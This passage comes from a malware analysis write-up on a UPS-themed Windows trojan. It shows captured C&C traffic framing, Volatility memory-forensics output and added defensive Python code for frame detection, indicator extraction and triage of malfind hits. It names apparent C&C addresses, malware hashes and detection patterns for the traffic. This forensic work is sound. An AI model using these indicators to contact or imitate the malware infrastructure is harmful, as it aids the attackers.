0000080: 122b a616 116c d0a7 5e9a 608a da39 a3ee .+...l..^.`..9..
0000090: 5e6b 4b0d 3255 bfef 9560 1890 afd8 0709 ^kK.2U...`......
It is nearly the same as the response body received for the POST request. Keep in mind that cmp stops at the first difference; cmp -l would list all differing bytes:
% cmp http_ok.raw ../written_files/in\[1\].htm -c
http_ok.raw ../written_files/in[1].htm differ: byte 161, line 1 is 142 b 131 Y
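In both directions the 32-bit little-endian word after the 0xdeadbeef magic equals the HTTP Content-Length (0x15c = 348 for the POST body, 0x9c7 = 2503 for the response), and the word after that is 1 in both captures. The following is an added example, not code from the original post, that parses this framing and checks the length field against the body, which is the sanity check a sensor should perform before trying to decode anything. The layout magic(4) | length(4, LE) | dword(4, LE, value 1 seen) | payload is an inference from the two dumps above; the payload stays opaque, since nothing on this page reveals the cipher. The sample frames are constructed: the first 16 bytes of each dump shown above, zero-padded to the advertised length.

```python
import struct

MAGIC = b"\xde\xad\xbe\xef"
HEADER = struct.Struct("<4sII")   # magic, total length (LE, == Content-Length), unknown dword (1 in both captures)

def parse_frame(data):
    """Parse one 0xdeadbeef frame (layout inferred from the two captures on this page).
    Returns a dict; raises ValueError on a frame that is too short or has the wrong magic."""
    if len(data) < HEADER.size:
        raise ValueError("short frame: %d bytes" % len(data))
    magic, total_len, flag = HEADER.unpack_from(data, 0)
    if magic != MAGIC:
        raise ValueError("bad magic %s" % magic.hex())
    return {
        "total_len": total_len,
        "flag": flag,
        "len_ok": total_len == len(data),        # length field must match what was actually received
        "payload": data[HEADER.size:total_len],  # opaque (encrypted) body
    }

def looks_like_frame(data):
    """Cheap matcher for a network sensor: correct magic and a consistent length field."""
    try:
        return parse_frame(data)["len_ok"]
    except ValueError:
        return False

# Constructed samples: first 16 bytes of each dump on this page, zero-padded to the advertised length.
POST_HEAD = bytes.fromhex("deadbeef5c0100000100000072e2a30a")   # Content-Length: 348
RESP_HEAD = bytes.fromhex("deadbeefc709000001000000c47ab3ba")   # Content-Length: 2503
POST_FRAME = POST_HEAD + b"\x00" * (348 - len(POST_HEAD))
RESP_FRAME = RESP_HEAD + b"\x00" * (2503 - len(RESP_HEAD))

if __name__ == "__main__":
    for name, frame in (("POST body", POST_FRAME), ("response body", RESP_FRAME)):
        f = parse_frame(frame)
        print("%-13s len=%d flag=%d len_ok=%s payload=%d bytes"
              % (name, f["total_len"], f["flag"], f["len_ok"], len(f["payload"])))
```

A truncated capture (or a frame whose length field disagrees with the body) fails the len_ok check rather than being fed to a decoder, which is the behaviour you want in a detection pipeline.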
I used VBox debug commands to create a memory snapshot during runtime.
I used the Volatility framework to analyze the memory dump:
% python vol.py imageinfo
Volatile Systems Volatility Framework 2.1_rc3
Determining profile based on KDBG search...
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86
AS Layer1 : JKIA32PagedMemoryPae (Kernel AS)
AS Layer2 : VirtualBoxCoreDumpElf64 (/home/xxx/ups_collect3.elf)
AS Layer3 : FileAddressSpace (/home/xxx/ups_collect3.elf)
PAE type : PAE
DTB : 0x312000L
KDBG : 0x80545ae0
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-08-06 07:20:26 UTC+0000
Image local date and time : 2012-08-06 09:20:26 +0200
% export VOLATILITY_LOCATION=file:///home/xxx/ups_collect3.elf
% export VOLATILITY_PROFILE=WinXPSP3x86
Volatility's pslist shows the copied malware process, KB00925890.exe (PID 652), if the snapshot is taken quickly enough; its parent, PID 1388, no longer appears in the active process list:
% python vol.py pslist
Volatile Systems Volatility Framework 2.1_rc3
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ -------------------- --------------------
0x823c89c8 System 4 0 54 236 ------ 0
0x821d5c30 smss.exe 360 4 3 19 ------ 0 2012-08-06 14:13:57
0x822d1020 csrss.exe 460 360 11 338 0 0 2012-08-06 14:13:57
0x8223e020 winlogon.exe 488 360 21 502 0 0 2012-08-06 14:13:57
0x822bd578 services.exe 648 488 16 246 0 0 2012-08-06 14:13:57
0x8219d458 lsass.exe 660 488 23 342 0 0 2012-08-06 14:13:57
0x82219438 VBoxService.exe 820 648 8 106 0 0 2012-08-06 14:13:58
0x821c17c0 svchost.exe 864 648 20 199 0 0 2012-08-06 14:13:58
0x82160020 svchost.exe 948 648 10 225 0 0 2012-08-06 14:13:58
0x82248478 svchost.exe 1040 648 66 1118 0 0 2012-08-06 14:13:58
0x82279020 svchost.exe 1096 648 5 74 0 0 2012-08-06 14:13:58
0x8221c818 svchost.exe 1148 648 14 195 0 0 2012-08-06 14:13:58
0x8205cb88 explorer.exe 1512 1468 14 433 0 0 2012-08-06 14:13:58
0x8215d880 spoolsv.exe 1592 648 13 117 0 0 2012-08-06 14:13:58
0x82107da0 VBoxTray.exe 1684 1512 7 65 0 0 2012-08-06 14:13:59
0x82249020 ctfmon.exe 1692 1512 1 70 0 0 2012-08-06 14:13:59
0x821da3c0 wuauclt.exe 160 1040 8 132 0 0 2012-08-06 14:14:08
0x81ff2628 alg.exe 872 648 7 102 0 0 2012-08-06 09:13:40
0x82190b10 KB00925890.exe 652 1388 1 14 0 0 2012-08-06 09:14:21
^^^^^
psscan, which carves _EPROCESS structures instead of walking the active process list, also reveals the original process: UPS_COLLECT_LETTER_N882342545.exe (PID 1388, started by explorer.exe) lived for two seconds and is the parent of both the copy KB00925890.exe (PID 652) and the cmd.exe (PID 232) that ran the self-deleting batch file:
% python vol.py psscan
Volatile Systems Volatility Framework 2.1_rc3
Offset(P) Name PID PPID PDB Time created Time exited
---------- ---------------- ------ ------ ---------- -------------------- --------------------
0x021f2628 alg.exe 872 648 0x0c000240 2012-08-06 09:13:40
0x0225cb88 explorer.exe 1512 1468 0x0c0001c0 2012-08-06 14:13:58
0x02264020 cmd.exe 232 1388 0x0c000280 2012-08-06 09:14:21 2012-08-06 09:14:22
0x02307da0 VBoxTray.exe 1684 1512 0x0c000200 2012-08-06 14:13:59
0x0235d880 spoolsv.exe 1592 648 0x0c0001e0 2012-08-06 14:13:58
0x02360020 svchost.exe 948 648 0x0c000100 2012-08-06 14:13:58
0x02390b10 KB00925890.exe 652 1388 0x0c000260 2012-08-06 09:14:21
0x0239d458 lsass.exe 660 488 0x0c0000a0 2012-08-06 14:13:57
0x023c17c0 svchost.exe 864 648 0x0c0000e0 2012-08-06 14:13:58
0x023d5c30 smss.exe 360 4 0x0c000020 2012-08-06 14:13:57
0x023da3c0 wuauclt.exe 160 1040 0x0c000220 2012-08-06 14:14:08
0x02419438 VBoxService.exe 820 648 0x0c0000c0 2012-08-06 14:13:58
0x0241c818 svchost.exe 1148 648 0x0c000160 2012-08-06 14:13:58
0x0243e020 winlogon.exe 488 360 0x0c000060 2012-08-06 14:13:57
0x02448478 svchost.exe 1040 648 0x0c000120 2012-08-06 14:13:58
0x02449020 ctfmon.exe 1692 1512 0x0c000180 2012-08-06 14:13:59
0x02479020 svchost.exe 1096 648 0x0c000140 2012-08-06 14:13:58
0x024b1820 UPS_COLLECT_LET 1388 1512 0x0c0001a0 2012-08-06 09:14:19 2012-08-06 09:14:21
^^^^^
0x024bd578 services.exe 648 488 0x0c000080 2012-08-06 14:13:57
0x024d1020 csrss.exe 460 360 0x0c000040 2012-08-06 14:13:57
0x025c89c8 System 4 0 0x00312000
The copied process has the following DLLs loaded. This matches the static import table: only kernel32.dll and ole32.dll are imported directly, the rest are their dependencies:
% python vol.py dlllist -p 652
Volatile Systems Volatility Framework 2.1_rc3
************************************************************************
KB00925890.exe pid: 652
Command line : "C:\Documents and Settings\xxx\Application Data\KB00925890.exe"
Service Pack 3
Base Size Path
---------- ---------- ----
0x00400000 0x28000 C:\Documents and Settings\xxx\Application Data\KB00925890.exe
0x7c900000 0xaf000 C:\WINDOWS\system32\ntdll.dll
0x7c800000 0xf6000 C:\WINDOWS\system32\kernel32.dll
0x774e0000 0x13d000 C:\WINDOWS\system32\ole32.dll
0x77dd0000 0x9b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77e70000 0x92000 C:\WINDOWS\system32\RPCRT4.dll
0x77fe0000 0x11000 C:\WINDOWS\system32\Secur32.dll
0x77f10000 0x49000 C:\WINDOWS\system32\GDI32.dll
0x7e410000 0x91000 C:\WINDOWS\system32\USER32.dll
0x77c10000 0x58000 C:\WINDOWS\system32\msvcrt.dll
Dumping the process's memory works, but does not reveal any useful information:
% python vol.py memdump -p 652 -D UPS_mem_dump
Volatile Systems Volatility Framework 2.1_rc3
************************************************************************
Writing KB00925890.exe [ 652] to 652.dmp
I dumped possible IPs and URLs from the memory, but without success:
% strings 652.dmp| perl -e 'while(<>){ if(/(http|https|ftp|mail)\:[\/\w.]+/){print $_;}}' | sort -u > URLs.txt
% strings 652.dmp| perl -e 'while(<>){if(/(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/){print $_;}}' | sort -u > IPs.txt
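One reason the one-liners above come back empty is that strings only emits ASCII runs by default, while Windows code keeps many of its strings in UTF-16LE (strings -e l would be needed as a second pass). The following is an added example, not code from the original post: it extracts both ASCII and UTF-16LE printable runs from a dump and filters them for IPv4 addresses (with the same octet validation as the perl regex above) and URLs. The input blob is constructed, not a real dump; it embeds the two C&C addresses from this analysis, one of them as a wide string, plus a dotted version number that must not be mistaken for an address.

```python
import re

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")                 # printable ASCII runs, 4+ chars
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")           # UTF-16LE runs of printable ASCII, 4+ chars
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\b")
URL_RE = re.compile(r"\b(?:https?|ftp)://[\w.\-]+(?::\d+)?[\w./\-?=&%]*")

def extract_strings(blob):
    """Return (ascii_strings, wide_strings) found in a byte blob, as Python str."""
    ascii_ = [m.group().decode("ascii") for m in ASCII_RE.finditer(blob)]
    wide = [m.group().decode("utf-16le") for m in WIDE_RE.finditer(blob)]
    return ascii_, wide

def find_indicators(blob):
    """Sorted unique IPv4 addresses and URLs from both string encodings."""
    ascii_, wide = extract_strings(blob)
    ips, urls = set(), set()
    for s in ascii_ + wide:
        ips.update(IPV4_RE.findall(s))
        urls.update(URL_RE.findall(s))
    return sorted(ips), sorted(urls)

# Constructed sample blob (not a real dump): an ASCII URL, a wide IP, some junk and a dotted version string.
SAMPLE = (b"\x00\x10" + b"http://84.53.217.109:8080/mx5/C/in/" + b"\x00" * 5
          + "78.46.64.17".encode("utf-16le") + b"\x00\x00"
          + b"\x90\x90\xcc" + b"version 1.0.10.999" + b"\x00")

if __name__ == "__main__":
    ips, urls = find_indicators(SAMPLE)
    print("IPs: ", ips)
    print("URLs:", urls)
```

Run it against 652.dmp by replacing SAMPLE with open("652.dmp", "rb").read(); the wide pass is what the original perl one-liners lack.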
Dumping the process's executable reveals the following:
% python vol.py procmemdump -p 652 --dump-dir=UPS_mem_dump/
Volatile Systems Volatility Framework 2.1_rc3
Process(V) ImageBase Name Result
---------- ---------- -------------------- ------
0x82190b10 0x00400000 KB00925890.exe OK: executable.652.exe
% file executable.652.exe
executable.652.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% md5sum executable.652.exe
47834ef1825e220ec77dd78ac75b1cbf executable.652.exe
% clamscan executable.652.exe
executable.652.exe: OK
A quick strings check did not show any useful information; the binary contains quite a number of encrypted/obfuscated strings. ClamAV no longer flags the dumped image, so the W32.Trojan.Yakes-23 signature evidently keys on the packed on-disk file, which the dump no longer resembles.
A filescan shows the batch file created by the malware:
% python vol.py filescan
Offset(P) #Ptr #Hnd Access Name
---------- ------ ------ ------ ----
[...]
0x023e6f90 2 0 -W-r-- \DOCUME~1\XXX~1\LOCALS~1\Temp\exp1.tmp.bat
[...]
malfind reports the following regions as possibly injected. It flags memory with PAGE_EXECUTE_READWRITE protection that is not backed by a mapped image, so these are candidates that still need to be checked, not confirmed injections:
Process: csrss.exe Pid: 460 Address: 0x7f6f0000
Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE
Flags: Protection: 6
0x7f6f0000 c8 00 00 00 3d 01 00 00 ff ee ff ee 08 70 00 00 ....=........p..
0x7f6f0010 08 00 00 00 00 fe 00 00 00 00 10 00 00 20 00 00 ................
0x7f6f0020 00 02 00 00 00 20 00 00 8d 01 00 00 ff ef fd 7f ................
0x7f6f0030 03 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x7f6f0000 c8000000 ENTER 0x0, 0x0
0x7f6f0004 3d010000ff CMP EAX, 0xff000001
0x7f6f0009 ee OUT DX, AL
0x7f6f000a ff DB 0xff
0x7f6f000b ee OUT DX, AL
0x7f6f000c 087000 OR [EAX+0x0], DH
0x7f6f000f 0008 ADD [EAX], CL
0x7f6f0011 0000 ADD [EAX], AL
0x7f6f0013 0000 ADD [EAX], AL
0x7f6f0015 fe00 INC BYTE [EAX]
0x7f6f0017 0000 ADD [EAX], AL
0x7f6f0019 0010 ADD [EAX], DL
0x7f6f001b 0000 ADD [EAX], AL
0x7f6f001d 2000 AND [EAX], AL
0x7f6f001f 0000 ADD [EAX], AL
0x7f6f0021 0200 ADD AL, [EAX]
0x7f6f0023 0000 ADD [EAX], AL
0x7f6f0025 2000 AND [EAX], AL
0x7f6f0027 008d010000ff ADD [EBP-0xffffff], CL
0x7f6f002d ef OUT DX, EAX
0x7f6f002e fd STD
0x7f6f002f 7f03 JG 0x7f6f0034
0x7f6f0031 0008 ADD [EAX], CL
0x7f6f0033 06 PUSH ES
0x7f6f0034 0000 ADD [EAX], AL
Process: winlogon.exe Pid: 488 Address: 0x302e0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 4, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x302e0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x302e0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x302e0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x302e0030 00 00 00 00 2a 00 2a 00 01 00 00 00 00 00 00 00 ....*.*.........
Process: explorer.exe Pid: 1512 Address: 0x2650000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 1, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x02650000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x02650010 00 00 65 02 00 00 00 00 00 00 00 00 00 00 00 00 ..e.............
0x02650020 10 00 65 02 00 00 00 00 00 00 00 00 00 00 00 00 ..e.............
0x02650030 20 00 65 02 00 00 00 00 00 00 00 00 00 00 00 00 ..e.............
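The three hits are not equally interesting. The csrss.exe region at 0x7f6f0000 is a mapped section (tag Vad, not VadS) whose first bytes are a heap header: the dword at offset 8, ff ee ff ee, is 0xEEFFEEFF, ntdll's HEAP_SIGNATURE, and the 0xFE00 at +0x14 is the heap's VirtualMemoryThreshold; disassembling it, as malfind did above, is meaningless, and this region is a known false positive. The winlogon.exe region is almost entirely zero at its base, and in explorer.exe the dwords at +0x10, +0x20 and +0x30 are pointers back into the region itself (0x02650000, 0x02650010, 0x02650020), which looks like a list or table header rather than code; whether either region holds code further in can only be settled by dumping it (malfind -D) and inspecting the whole thing. The following added example, not code from the original post or from Volatility, is a small triage function for malfind hits that applies exactly these checks (PE header, heap signature, self-referencing pointers, mostly-empty page) to the bytes malfind prints; the three inputs are transcribed from the hex above.

```python
import struct

HEAP_SIGNATURE = 0xEEFFEEFF   # ntdll _HEAP.Signature; on XP it sits at offset 8 of the heap base

def classify_region(base, data):
    """Coarse label for the first bytes of a malfind hit (base = region VA, data = dumped bytes)."""
    if data[:2] == b"MZ":
        return "pe-image"                       # a whole image was injected: dump it and treat it as a PE
    if len(data) >= 12 and struct.unpack_from("<I", data, 8)[0] == HEAP_SIGNATURE:
        return "heap"                           # RWX heap header, not code: a known false positive
    words = struct.unpack_from("<%dI" % (len(data) // 4), data, 0)
    if any(base <= w < base + 0x10000 for w in words if w):
        return "self-referencing structure"     # pointers back into the region: list/table header, not code
    nonzero = sum(1 for b in data if b)
    if nonzero < len(data) * 0.10:
        return "mostly empty"                   # nothing at the base; code, if any, lives deeper in the region
    return "review"                             # dump the full region (malfind -D) and disassemble it

# Transcribed from the three malfind hits on this page (first 64 bytes of each region).
CSRSS = bytes.fromhex(
    "c80000003d010000ffeeffee08700000"
    "0800000000fe00000000100000200000"
    "00020000002000008d010000ffeffd7f"
    "03000806000000000000000000000000")
WINLOGON = bytes(48) + bytes.fromhex("000000002a002a000100000000000000")
EXPLORER = (bytes(16) + bytes.fromhex("00006502") + bytes(12)
            + bytes.fromhex("10006502") + bytes(12)
            + bytes.fromhex("20006502") + bytes(12))

if __name__ == "__main__":
    for name, base, data in (("csrss.exe", 0x7f6f0000, CSRSS),
                             ("winlogon.exe", 0x302e0000, WINLOGON),
                             ("explorer.exe", 0x02650000, EXPLORER)):
        print("%-13s 0x%08x  %s" % (name, base, classify_region(base, data)))
```

Only "pe-image" and "review" deserve immediate attention; "heap" can be suppressed outright, and the other two labels mean the interesting bytes, if any, are not at the start of the region.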